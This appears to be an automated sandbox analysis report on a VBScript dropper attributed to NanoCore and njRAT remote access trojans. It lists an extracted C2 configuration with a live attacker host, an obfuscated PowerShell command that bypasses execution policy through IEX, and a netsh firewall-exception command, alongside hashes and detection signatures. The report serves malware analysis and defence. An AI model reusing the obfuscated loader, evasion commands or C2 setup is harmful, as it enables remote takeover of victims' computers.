Overview

overview

10

Static

static

8d8c154690...72.vbs

windows7_x64

3

8d8c154690...72.vbs

windows10_x64

10

Analysis

  • max time kernel
    37s
  • max time network
    40s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    18-11-2021 21:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8d8c15469072ede8e80eb85c7f3ef44ba53778831c28dab5a6562a0672b1bc72.vbs

  • Size

    2KB

  • MD5

    76d64bdec97716fc5db19bf4d9fd3255

  • SHA1

    35f62e6cc17c8bc982db07c556216d98fd600c02

  • SHA256

    8d8c15469072ede8e80eb85c7f3ef44ba53778831c28dab5a6562a0672b1bc72

  • SHA512

    d38a1e31a96267bb7706b4e072c6c383bb26eb2e065b0b6e5b6c178ac87cc0115d2a2f88ec5ab71a93364197e1eefff0e3c3cb87a50b636607e2026b962c90f9

Score
10/10
nanocorenjrathackedevasionkeyloggerpersistencespywarestealersuricatatrojan

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

C2

jamcav.duckdns.org:6746

Mutex

9bb8b571-1a08-4fb2-8447-a1da0968f2fa

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    jamcav.duckdns.org

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2021-08-20T15:54:30.577245636Z

  • bypass_user_account_control

    true

  • bypass_user_account_control_data

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    6746

  • default_group

    jam

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    9bb8b571-1a08-4fb2-8447-a1da0968f2fa

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    jamcav.duckdns.org

  • primary_dns_server

    8.8.8.8

  • request_elevation

    true

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    true

  • set_critical_process

    true

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Mutex

Microsoft.Exe

Attributes
  • reg_key

    Microsoft.Exe

Signatures

  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

    keyloggertrojanstealerspywarenanocore
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata
  • suricata: ET MALWARE Possible NanoCore C2 60B

    suricata: ET MALWARE Possible NanoCore C2 60B

    suricata
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8d8c15469072ede8e80eb85c7f3ef44ba53778831c28dab5a6562a0672b1bc72.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps1
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4448
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:2904
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          4⤵
            PID:656
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
            4⤵
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:820
            • C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
              "C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe"
              5⤵
              • Executes dropped EXE
              PID:3524
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
            4⤵
              PID:1160
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1236
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" "jsc.exe" ENABLE
                5⤵
                  PID:5008

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Modify Existing Service

        1
        T1031

        Registry Run Keys / Startup Folder

        1
        T1060

        Privilege Escalation

        Defense Evasion

        Modify Registry

        1
        T1112

        Credential Access

        Discovery

        System Information Discovery

        1
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          MD5

          ea6243fdb2bfcca2211884b0a21a0afc

          SHA1

          2eee5232ca6acc33c3e7de03900e890f4adf0f2f

          SHA256

          5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

          SHA512

          189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          3e0d474962b019b39c8ace47bf176523

          SHA1

          f38c65d41f3913b976ee611425756524c036164d

          SHA256

          57d1dce477e2bd4e12f1331e711f52b2e7f4f916ca505ce2fcd395616883f8bd

          SHA512

          5c3cf8404baac17b927e34c5379e1b992b07f286f4710eee684a3ba0c5d8597b9f1fc8d9de5c13b17730a044070bd1eb4d1e8a5d3cc21d5958ddd431e341f688

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
          MD5

          f1feead2143c07ca411d82a29fa964af

          SHA1

          2198e7bf402773757bb2a25311ffd2644e5a1645

          SHA256

          8f2800ac8af72e8038e146b3988a30651952f20ed6cdf7be3ae4709fbb026af1

          SHA512

          e7e2266ec862a793da7cea01c926b7a874453cf2efb0b4b77776c26042dc2ded74f17c390fad97bd2d8c0c4971a1b9d9e6c705a13edbc9e48570922e5e6cc9df

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
          MD5

          f1feead2143c07ca411d82a29fa964af

          SHA1

          2198e7bf402773757bb2a25311ffd2644e5a1645

          SHA256

          8f2800ac8af72e8038e146b3988a30651952f20ed6cdf7be3ae4709fbb026af1

          SHA512

          e7e2266ec862a793da7cea01c926b7a874453cf2efb0b4b77776c26042dc2ded74f17c390fad97bd2d8c0c4971a1b9d9e6c705a13edbc9e48570922e5e6cc9df

          Download Submit
        • C:\Users\Public\Downloads\HBar.ps1
          MD5

          b1da375f7fc47b6e7f441a44b1925371

          SHA1

          336132bf0096ad8fa877cf25978e9bb2b911554e

          SHA256

          51b7e07f22110272589c03f523256f454274605cc41ed5847448b9c0bf62e4bd

          SHA512

          d9861c341b1ae91647d51053b93291ca5862de418a5a42ac56c765e19abb7cf9f5c29bc6e72c1789c3921481f13a0498c1d329dbc68a39c8d8db5b59652f7248

          Download Submit
        • memory/820-178-0x00000000004123BE-mapping.dmp
          Download
        • memory/820-177-0x0000000000400000-0x0000000000418000-memory.dmp
          Filesize

          96KB

          Download
        • memory/820-199-0x0000000005040000-0x000000000553E000-memory.dmp
          Filesize

          5.0MB

          Download
        • memory/1236-225-0x00000000050B0000-0x000000000514C000-memory.dmp
          Filesize

          624KB

          Download
        • memory/1236-189-0x0000000000400000-0x0000000000410000-memory.dmp
          Filesize

          64KB

          Download
        • memory/1236-190-0x000000000040BBCE-mapping.dmp
          Download
        • memory/2820-127-0x0000024036EE0000-0x0000024036EE2000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2820-121-0x0000024036EE0000-0x0000024036EE2000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2820-118-0x0000000000000000-mapping.dmp
          Download
        • memory/2820-129-0x0000024051110000-0x0000024051111000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2820-119-0x0000024036EE0000-0x0000024036EE2000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2820-128-0x0000024036EE0000-0x0000024036EE2000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2820-120-0x0000024036EE0000-0x0000024036EE2000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2820-130-0x0000024036EE0000-0x0000024036EE2000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2820-140-0x00000240512E0000-0x00000240512E2000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2820-142-0x00000240512E3000-0x00000240512E5000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2820-205-0x00000240512E6000-0x00000240512E8000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2820-126-0x0000024036EE0000-0x0000024036EE2000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2820-125-0x0000024036EE0000-0x0000024036EE2000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2820-124-0x0000024038B70000-0x0000024038B71000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2820-122-0x0000024036EE0000-0x0000024036EE2000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2820-123-0x0000024036EE0000-0x0000024036EE2000-memory.dmp
          Filesize

          8KB

          Download
        • memory/2904-195-0x0000000005680000-0x0000000005B7E000-memory.dmp
          Filesize

          5.0MB

          Download
        • memory/2904-191-0x0000000005860000-0x0000000005879000-memory.dmp
          Filesize

          100KB

          Download
        • memory/2904-198-0x0000000005680000-0x0000000005B7E000-memory.dmp
          Filesize

          5.0MB

          Download
        • memory/2904-167-0x0000000000400000-0x0000000000438000-memory.dmp
          Filesize

          224KB

          Download
        • memory/2904-168-0x000000000041E792-mapping.dmp
          Download
        • memory/2904-171-0x0000000005B80000-0x0000000005B81000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2904-172-0x00000000055C0000-0x00000000055C1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2904-173-0x0000000005680000-0x0000000005681000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2904-185-0x0000000005660000-0x0000000005665000-memory.dmp
          Filesize

          20KB

          Download
        • memory/2904-184-0x0000000005540000-0x0000000005541000-memory.dmp
          Filesize

          4KB

          Download
        • memory/3524-206-0x0000000000000000-mapping.dmp
          Download
        • memory/3524-210-0x000000007EF40000-0x000000007EF41000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4448-134-0x0000000000000000-mapping.dmp
          Download
        • memory/4448-145-0x000001B619370000-0x000001B619372000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4448-155-0x000001B633156000-0x000001B633158000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4448-151-0x000001B619370000-0x000001B619372000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4448-148-0x000001B619370000-0x000001B619372000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4448-147-0x000001B619370000-0x000001B619372000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4448-146-0x000001B619370000-0x000001B619372000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4448-166-0x000001B633140000-0x000001B633144000-memory.dmp
          Filesize

          16KB

          Download
        • memory/4448-144-0x000001B633153000-0x000001B633155000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4448-143-0x000001B633150000-0x000001B633152000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4448-139-0x000001B619370000-0x000001B619372000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4448-138-0x000001B619370000-0x000001B619372000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4448-137-0x000001B619370000-0x000001B619372000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4448-136-0x000001B619370000-0x000001B619372000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4448-135-0x000001B619370000-0x000001B619372000-memory.dmp
          Filesize

          8KB

          Download
        • memory/5008-224-0x0000000000000000-mapping.dmp
          Download